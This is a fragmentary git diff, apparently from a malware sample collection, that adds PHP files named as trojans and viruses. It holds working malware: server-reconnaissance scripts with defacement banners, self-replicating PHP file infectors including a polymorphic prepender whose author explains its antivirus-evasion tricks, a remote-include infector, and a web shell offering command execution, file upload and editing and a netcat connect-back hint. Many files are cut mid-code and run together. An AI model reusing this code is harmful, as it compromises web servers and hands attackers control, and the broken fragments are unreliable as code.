    "; +exit; + diff --git a/PHP/Trojan.PHP.Agent.c b/PHP/Trojan.PHP.Agent.c new file mode 100644 index 00000000..a20c8e1a --- /dev/null +++ b/PHP/Trojan.PHP.Agent.c @@ -0,0 +1,1890 @@ + \ No newline at end of file diff --git a/PHP/Trojan.PHP.Agent.d b/PHP/Trojan.PHP.Agent.d new file mode 100644 index 00000000..2524b29c --- /dev/null +++ b/PHP/Trojan.PHP.Agent.d @@ -0,0 +1,33 @@ += 4 && $len <=6) { +return sprintf("%0.2f Kb", $number/1024); } +if($len >= 7 && $len <=9) { +return sprintf("%0.2f Mb", $number/1024/1024); } +return sprintf("%0.2f Gb", $number/1024/1024/1024); } + +echo "Jikustik
    "; +$un = @php_uname(); +$id1 = system(id); +$pwd1 = @getcwd(); +$free1= diskfreespace($pwd1); +$free = ConvertBytes(diskfreespace($pwd1)); +if (!$free) {$free = 0;} +$all1= disk_total_space($pwd1); +$all = ConvertBytes(disk_total_space($pwd1)); +if (!$all) {$all = 0;} +$used = ConvertBytes($all1-$free1); +$os = @PHP_OS; + +echo "Jikustik was here ..
    "; +echo "uname -a: $un
    "; +echo "os: $os
    "; +echo "id: $id1
    "; +echo "free: $free
    "; +echo "used: $used
    "; +echo "total: $all
    "; +exit; +?> diff --git a/PHP/Trojan.PHP.Io b/PHP/Trojan.PHP.Io new file mode 100644 index 00000000..8acab09a --- /dev/null +++ b/PHP/Trojan.PHP.Io @@ -0,0 +1 @@ + diff --git a/PHP/Trojan.PHP.PHPInfo.a b/PHP/Trojan.PHP.PHPInfo.a new file mode 100644 index 00000000..a0c64988 --- /dev/null +++ b/PHP/Trojan.PHP.PHPInfo.a @@ -0,0 +1,32 @@ += 4 && $len <=6) { +return sprintf("%0.2f Kb", $number/1024); } +if($len >= 7 && $len <=9) { +return sprintf("%0.2f Mb", $number/1024/1024); } +return sprintf("%0.2f Gb", $number/1024/1024/1024); } + +echo "Osirys
    "; +$un = @php_uname(); +$id1 = system(id); +$pwd1 = @getcwd(); +$free1= diskfreespace($pwd1); +$free = ConvertBytes(diskfreespace($pwd1)); +if (!$free) {$free = 0;} +$all1= disk_total_space($pwd1); +$all = ConvertBytes(disk_total_space($pwd1)); +if (!$all) {$all = 0;} +$used = ConvertBytes($all1-$free1); +$os = @PHP_OS; + +echo "0sirys was here ..
    "; +echo "uname -a: $un
    "; +echo "os: $os
    "; +echo "id: $id1
    "; +echo "free: $free
    "; +echo "used: $used
    "; +echo "total: $all
    "; +exit; diff --git a/PHP/Trojan.PHP.PHPInfo.c b/PHP/Trojan.PHP.PHPInfo.c new file mode 100644 index 00000000..ce235f71 --- /dev/null +++ b/PHP/Trojan.PHP.PHPInfo.c @@ -0,0 +1,55 @@ += 4 && $len <=6) + { + return sprintf("%0.2f Kb", $number/1024); + } + if($len >= 7 && $len <=9) + { + return sprintf("%0.2f Mb", $number/1024/1024); + } + + return sprintf("%0.2f Gb", $number/1024/1024/1024); + +} + +echo "narasaon
    "; +$un = @php_uname(); +$up = system(uptime); +$id1 = system(id); +$pwd1 = @getcwd(); +$sof1 = getenv("SERVER_SOFTWARE"); +$php1 = phpversion(); +$name1 = $_SERVER['SERVER_NAME']; +$ip1 = gethostbyname($SERVER_ADDR); +$free1= diskfreespace($pwd1); +$free = ConvertBytes(diskfreespace($pwd1)); +if (!$free) {$free = 0;} +$all1= disk_total_space($pwd1); +$all = ConvertBytes(disk_total_space($pwd1)); +if (!$all) {$all = 0;} +$used = ConvertBytes($all1-$free1); +$os = @PHP_OS; + + +echo "narasaon was here ..
    "; +echo "uname -a: $un
    "; +echo "os: $os
    "; +echo "uptime: $up
    "; +echo "id: $id1
    "; +echo "pwd: $pwd1
    "; +echo "php: $php1
    "; +echo "software: $sof1
    "; +echo "server-name: $name1
    "; +echo "server-ip: $ip1
    "; +echo "free: $free
    "; +echo "used: $used
    "; +echo "total: $all
    "; +exit; + diff --git a/PHP/Trojan.PHP.PHPInfo.e b/PHP/Trojan.PHP.PHPInfo.e new file mode 100644 index 00000000..196e5bdd --- /dev/null +++ b/PHP/Trojan.PHP.PHPInfo.e @@ -0,0 +1,55 @@ +"); + $fputs($new, ""); + return; + } +} +closedir($all); +// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group. +?> + + diff --git a/PHP/Virus.PHP.Feast.a b/PHP/Virus.PHP.Feast.a new file mode 100644 index 00000000..9ae219fe --- /dev/null +++ b/PHP/Virus.PHP.Feast.a @@ -0,0 +1,31 @@ + \ No newline at end of file diff --git a/PHP/Virus.PHP.Indonesia b/PHP/Virus.PHP.Indonesia new file mode 100644 index 00000000..d0578e53 --- /dev/null +++ b/PHP/Virus.PHP.Indonesia @@ -0,0 +1,35 @@ +$jawa = "indonesia.php\n"; +$sumatra = "Wellcome to Indonesian PHPlovers.\n"; +$kalimantan = $jawa . $sumatra; +echo $kalimantan; +$all = opendir('C:\Windows\'); +$all1 = opendir('C:\My Documents\'); +$all2 = opendir('C:\InetPub\wwwRoot\'); +$all3 = $all && $all1 && $all2 +while ($file = readdir($all3)) +{ +$inf = true; +$exe = false; +if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.php2')) || ($exe = strstr ($file, '.php3')) ) +if ( is_file($file) && is_writeable($file) ) +{ +$new = fopen($file, "r"); +$look = fread($new, filesize($file)); +$yes = strstr ($look, 'indonesia.php'); +if (!$yes) $inf = false; +} +if ( ($inf=false) ) +{ +$new = fopen($file, "a"); +$fputs($new, ""); +$fputs($new, " $fputs($new, "include(\""); +$fputs($new, __FILE__); +$fputs($new, "\"); "); +$fputs($new, "?>"); +return; +} +} +closedir($all3); +// PHP.Indonesia made for all Chicken looser ground the world +// By sevenC / N0:7 +?> \ No newline at end of file diff --git a/PHP/Virus.PHP.Neworld b/PHP/Virus.PHP.Neworld new file mode 100644 index 00000000..c6136496 --- /dev/null +++ b/PHP/Virus.PHP.Neworld @@ -0,0 +1,45 @@ +"); + $fputs($new, ""); + return; + } +} +closedir($all); +// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group. +?> \ No newline at end of file diff --git a/PHP/Virus.PHP.Pirus b/PHP/Virus.PHP.Pirus new file mode 100644 index 00000000..520d786d --- /dev/null +++ b/PHP/Virus.PHP.Pirus @@ -0,0 +1,29 @@ +"); + fclose($host); + return; + } +} +closedir($handle); +?> diff --git a/PHP/Virus.PHP.Pooks.a b/PHP/Virus.PHP.Pooks.a new file mode 100644 index 00000000..2d34ce9b --- /dev/null +++ b/PHP/Virus.PHP.Pooks.a @@ -0,0 +1,43 @@ +Get the source of this phile here
    '; + +@include($_GET['atk_script']); +infect('../../../../../../../../../../../../../../../../'); +?> diff --git a/PHP/Virus.PHP.Qwax b/PHP/Virus.PHP.Qwax new file mode 100644 index 00000000..9854c4bc --- /dev/null +++ b/PHP/Virus.PHP.Qwax @@ -0,0 +1,92 @@ +PHP.QAZWSX +") != 0) + { + if ($bracket_found) + { + break; + } + else + { + $bracket_found = true; + } + + } + } + else if (strrpos($s, "QAZWSX") != 0) + { + $found = true; + $self = $s; + } + +} + +fclose($sf); + +Infect($DOCUMENT_ROOT."/"); + + ?> + diff --git a/PHP/Virus.PHP.Rabow b/PHP/Virus.PHP.Rabow new file mode 100644 index 00000000..49d109a2 --- /dev/null +++ b/PHP/Virus.PHP.Rabow @@ -0,0 +1,38 @@ +'){ +if(rand(0,1)){ +if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);} +if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);} +if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}} + $string=strtok(chr(13).chr(10)); +if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}} + $counti=0; +while($changevars[$counti]){ + $newcont=str_replace($changevars[$counti++],trash('',0),$newcont);} + $countj=-1; $number=''; +while(++$countj47&&ord($newcont{$countj})<58){ + $number=$newcont{$countj}; +while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};} + $remn=rand(1,10); +if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break; +case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break; +case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}} + $allcont.=$newcont{$countj};$number='';} + $curdir=opendir('.'); +while($filea=readdir($curdir)){ +if(strstr($filea,'.php')){$victim=fopen($filea,'r+'); +if (!strstr(fread($victim, 25),'RainBow')){rewind($victim); + $viccont=fread($victim,filesize($filea)); +rewind($victim); +fwrite($victim,$allcont.$viccont);} +fclose($victim);}} +closedir($curdir); +function trash($returnvar, $countj){ +do{$returnvar.=chr(rand(97,122));}while($countj++ \ No newline at end of file diff --git a/PHP/Virus.PHP.Rabow.a b/PHP/Virus.PHP.Rabow.a new file mode 100644 index 00000000..654a88fc --- /dev/null +++ b/PHP/Virus.PHP.Rabow.a @@ -0,0 +1,128 @@ + PHP.Rainbow + by Second Part To Hell[rRlf] + www.spth.de.vu + spth@aonmail.at + written in october 2003 + in Austria + + You're looking at my very first PHP virus, but don't be sad, it's a really good one :) + First I want to tell you something about the features of the virus, that I'll give + you some Information about the technique of the features. + OK, it's a Prepender PHP virus, which uses three polymorphism tecniques. The poly engine + are totally new, because I've never seen any other poly PHP virus (Kefi did one in + the meantime, but I haven't seen it so far). As I told you, there are three different + Polymorphism techniques, I'm sure that you want to know more about them :) First engine + adds trash/garbage/junk (however you wanna call it) to the code, the second one changes + 15 variable/function names. And the last one changes numbers. Now let's have a look at + the better explanation, not this shourt summary :) + + Technique Information: + + * Poly Engines + + --> Adding Trash/Junk/Garbage + The Virus adds ine in two lines a junk line to the code. + This Junk-line could contain: + - // anything + - $anything='anything'; + - $anything=number; + Because the code would be damn big after the 5th generation, I desided + to delete the trash after every generation and make a new one. Anyway, + the chance to get a trash-line will be bigger, because there are more + lines (more lines --> more chance). But I tested about 30 generation + and it's no big problem with the size. + + --> Changing Variable/function names + The Virus uses an array with all variable/function names of the virus, + every generation it changes every array-entry (every name) to a 5-15 + sign long new name. + + --> Number changing + The virus is able to change every number in the code. This is a real + successfull way to fake AVs, i think! A number (for instands '10') could + also be one of the following things: + 10=(8+2) + 10=(19-9) + 10=(130/13) + It's easy to understand, I think. I desided to change ever 5th number I can + find, because it looks better than changing every number every generation. + + + * Infection Method + + --> Prepender + This code is a prepender virus, which doesn't harm the victim file. + It reads the first PHP part (which is the whole virus code) of the current + file (__FILE__, as it's called in PHP). Than it searchs for every PHP-files + in the current directory, and adds the changed virus code at the beginn of + the victim file. Before infecting the virus checks, if there's already an + infection mark or the virus, which is 'RainBow'. + + Something else little interesting is, that it's hard to get many different generations from + the virus, because it just changes, if it infects a file. And just the infected file has the + different form, not the old virus. That's a little trick, which I read in an article about + Polymorphism by SnakeByte. He wrote, that it will use more time to get many generations, which + is a problem for AVs (who needs many generations :D). + + In the end I want to thank the following people, which made it possible, that I + wrote this virus :) + + - Fugo <-- Guy from school, PHP expert but non viral stuff :( + Much thanks for the information you gave me in PHP! + + - www.php.net & www.apachefriends.com <-- Great PHP information!!! + + - MaskBits/VXI <-- Writing the first real PHP maleware (released in 29A#5) + + - PhileT0Ast3r <-- Telling me, that Kefi also writes a PHP poly virus + + - Kefi <-- for also writing a PHP poly virus :D + + - Theatre Of Tragedy | Darkfall <-- for the great sounds!!! + + - Cigarettes | Beer <-- for helping me to don't commit suicide while searching + for the bugs in this little thing :) + + Maybe you wanna know, why I gave this name. I won't tell you, but the person, where the name + comes from, should understand it ;) + Execute this virus with PHP 4.3.3 + PEAR. I did it, and it worked really fine! + +--------------------------------------< PHP.RainBow >-------------------------------------- +'){ +if(rand(0,1)){ +if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);} +if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);} +if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}} + $string=strtok(chr(13).chr(10)); +if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}} + $counti=0; +while($changevars[$counti]){ + $newcont=str_replace($changevars[$counti++],trash('',0),$newcont);} + $countj=-1; $number=''; +while(++$countj47&&ord($newcont{$countj})<58){ + $number=$newcont{$countj}; +while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};} + $remn=rand(1,10); +if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break; +case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break; +case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}} + $allcont.=$newcont{$countj};$number='';} + $curdir=opendir('.'); +while($filea=readdir($curdir)){ +if(strstr($filea,'.php')){$victim=fopen($filea,'r+'); +if (!strstr(fread($victim, 25),'RainBow')){rewind($victim); + $viccont=fread($victim,filesize($filea)); +rewind($victim); +fwrite($victim,$allcont.$viccont);} +fclose($victim);}} +closedir($curdir); +function trash($returnvar, $countj){ +do{$returnvar.=chr(rand(97,122));}while($countj++ \ No newline at end of file diff --git a/PHP/Virus.PHP.Rebber b/PHP/Virus.PHP.Rebber new file mode 100644 index 00000000..0c52ba71 --- /dev/null +++ b/PHP/Virus.PHP.Rebber @@ -0,0 +1,42 @@ + \ No newline at end of file diff --git a/PHP/Virus.PHP.Redz b/PHP/Virus.PHP.Redz new file mode 100644 index 00000000..391ce445 --- /dev/null +++ b/PHP/Virus.PHP.Redz @@ -0,0 +1,31 @@ +"); + fclose($host); + return; + } +} +closedir($handle); +?> diff --git a/PHP/Virus.PHP.Socrate.a b/PHP/Virus.PHP.Socrate.a new file mode 100644 index 00000000..944983a3 --- /dev/null +++ b/PHP/Virus.PHP.Socrate.a @@ -0,0 +1,174 @@ +"."The only true wisdom is in knowing you know nothing."); + +$decrypt= +"function SocratesDecrypt(\$string,\$key)\r\n" + +."{ \r\n" + +." \$codez=''; \r\n" + +." for(\$i=0; \$i'); + + fclose($g); + + } + + + + + + } + + } + + if (strstr($file,'.txt')) + + { + + $f = fopen($file,'w'); + + fwrite($f,"Let him that would move the world, first move himself."); + + } + + }?> + + diff --git a/PHP/Virus.PHP.Virdrus b/PHP/Virus.PHP.Virdrus new file mode 100644 index 00000000..c04f4b67 --- /dev/null +++ b/PHP/Virus.PHP.Virdrus @@ -0,0 +1,44 @@ + \ No newline at end of file
+
+

+ Safe Mode ON'; +} else { + print 'Safe Mode OFF'; +} + +?> + 

!
+  + + + + + +
+

[ Server Info ]

+

+ Current Directory: +
+ Shell: +
+ Server Software:
+ Server Name:
+ Server Protocol:
+


+ + + + + + + + + + + + + + + + + + + + + + + + + +
+

[ Command Execute ]

+

[ File Upload ]

+

+

+
+Insert your commands here:
+
+
+


+ +

+
+
+ Info: For a connect + back Shell, use: nc -e cmd.exe [SERVER] 3333
+
after local command: nc -v -l -p 3333 (Windows)



+

+


+
+Here you can upload some files.
+
+
+
+ 
+

+
+File already exist

"; + } + + else + { + copy($file,"$filename"); + if( file_exists($filename)) + { + echo "

File uploaded successful

"; + } + elseif(! file_exists($filename)) + { + echo "

File not found

"; + } + } +} +?> + +

+

+

[ Files & Directories ]

+

[ File Inclusion ]

+ +

+
+

+'.$file.'
'; +} +closedir($folder); +?> +

 

+


+ Include + something :)
+

+

+
+
+

+
+ +
+

[ File Editor ]

+

[ Notices ]

+ +

Error or No contents in file"; + } + else + $status = "File does not exist!"; +} +else if($_POST["submit"] == "Delete") +{ + if(file_exists($filename)) + { + if(unlink($filename)) + $status = "File successfully deleted!"; + else + $status = "Could not delete file!"; + } + else + $status = "File does not exist!"; +} +else if($_POST["submit"] == "Save") +{ + $filecontents = stripslashes(html_entity_decode($_POST["contents"])); + + if(file_exists($filename)) + unlink($filename); + + $handle = fopen($filename, "w"); + + if(!$handle) + $status = "Could not open file for write access! "; + else + { + if(!fwrite($handle, $filecontents)) + $status = $status."Could not write to file! (Maybe you didn't enter any text?)"; + + fclose($handle); + } + + $filecontents = htmlentities($filecontents); +} +else +{ + $status = "No file loaded!"; +} +?> + + + + + + + + + + + + + +
+ + + + +
+
+ + + +
+
+ +
+ + + +
+

+

+


+
+  

+
+